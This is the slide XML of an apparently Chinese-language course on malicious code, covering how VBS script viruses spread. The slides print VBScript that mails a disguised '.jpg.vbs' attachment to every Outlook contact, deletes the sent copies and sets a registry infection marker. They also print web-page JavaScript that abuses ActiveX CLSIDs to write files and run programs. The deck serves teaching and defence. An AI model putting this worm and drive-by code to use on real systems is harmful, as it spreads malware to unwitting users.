                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>OUTLOOK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>应用的对象</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"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If outlookApp= "Outlook" Then</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Set mapiObj=outlookApp.GetNameSpace("MAPI")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获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>MAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的名字空间</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Set addrList= mapiObj.AddressLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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获取地址表的个数</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脚本病毒通过网络传播的几种方式及代码分析（续）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="583565" y="1584960"/>
            <a:ext cx="11525885" cy="4490720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>For Each addr In addrList</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>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If addr.AddressEntries.Count &lt;&gt; 0 Then</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addrEntCount = addr.AddressEntries.Count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获取每个地址表的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>记录数</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For addrEntIndex= 1 To addrEntCount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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遍历地址表的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址</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Set item = outlookApp.CreateItem(0)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获取一个邮件对象实例</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Set addrEnt = addr.AddressEntries(addrEntIndex)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获取具体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>           item.To = addrEnt.Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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填入收信人地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>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item.Subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>病毒传播实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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写入邮件标题</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item.Body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>这里是病毒邮件传播测试！</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"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写入文件内容</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a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>           </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1"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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脚本病毒通过网络传播的几种方式及代码分析（续）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22530" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="427990" y="1714500"/>
            <a:ext cx="10168890" cy="4472305"/>
            <a:chOff x="-3" y="-3"/>
            <a:chExt cx="5305" cy="3132"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22531" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="-3"/>
              <a:ext cx="5299" cy="3129"/>
              <a:chOff x="0" y="-3"/>
              <a:chExt cx="5299" cy="3129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22532" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="43" y="-3"/>
                <a:ext cx="5213" cy="3126"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr anchor="t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="just"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="16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Set attachMents=item.Attachments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定义邮件附件</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just"/>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attachMents.Add fileSysObj.GetSpecialFolder(0)&amp;"\test.jpg.vbs“</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item.DeleteAfterSubmit = True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信件提交后自动删除</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>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If item.To &lt;&gt; "" Then</a:t>
                </a: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item.Send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发送邮件</a:t>
                </a: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shellObj.regwrite "HKCU\software\Mailtest\mailed", "1"</a:t>
                </a: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病毒标记，以免重复感染</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just" eaLnBrk="0"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End If</a:t>
                </a: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Next</a:t>
                </a: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End If</a:t>
                </a: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Next</a:t>
                </a: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   End if</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                    <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                  </a:rPr>
                  <a:t>End Function</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just" eaLnBrk="0" hangingPunct="0"/>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                  <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22533" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5299" cy="3126"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="7"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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22534" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-3" y="-3"/>
              <a:ext cx="5305" cy="3132"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="11112" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="A0A0A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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等网页文件传播</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27652" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694690" y="1477645"/>
            <a:ext cx="9731375" cy="4488180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>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&lt;html&gt;</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&lt;head&gt;</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&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CLSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建实例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>&lt;/title&gt;</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&lt;meta http-equiv="Content-Type" content="text/html; charset=gb2312"&gt;</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&lt;/head&gt;</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&lt;script language="JavaScript"&gt;</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document.write("&lt;APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent&gt;&lt;/APPLET&gt;");</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function creatObj() {</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try{</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obj=document.applets[0];</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obj.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>章 其它恶意代码分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>脚本病毒的基本原理及其防治</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>即时通讯病毒</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络钓鱼</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>流氓软件</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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等网页文件传播</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29700" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550545" y="1303655"/>
            <a:ext cx="10903585" cy="5047615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>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obj.createInstance();                      //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建一个实例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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fso=obj.GetObject();                      //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>获取文件系统对象，以便写文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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tsObj=fso.OpenTextFile("c:\\testCLSID.txt",2,true);</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tsObj.Write("Hello FSO");</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tsObj.Close();</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obj.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");</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obj.createInstance();                     //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>创建一个实例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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WshShell=obj.GetObject();                 //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对象，以便运行程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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WshShell.Run("notepad c:\\testCLSID.txt");</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zh-CN" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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zh-CN" sz="1600" b="1"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wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过感染</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等网页文件传播</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1439545"/>
            <a:ext cx="9587865" cy="4356735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>catch(e)</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   {}</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&lt;/script&gt;</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&lt;body&gt;</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&lt;H1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
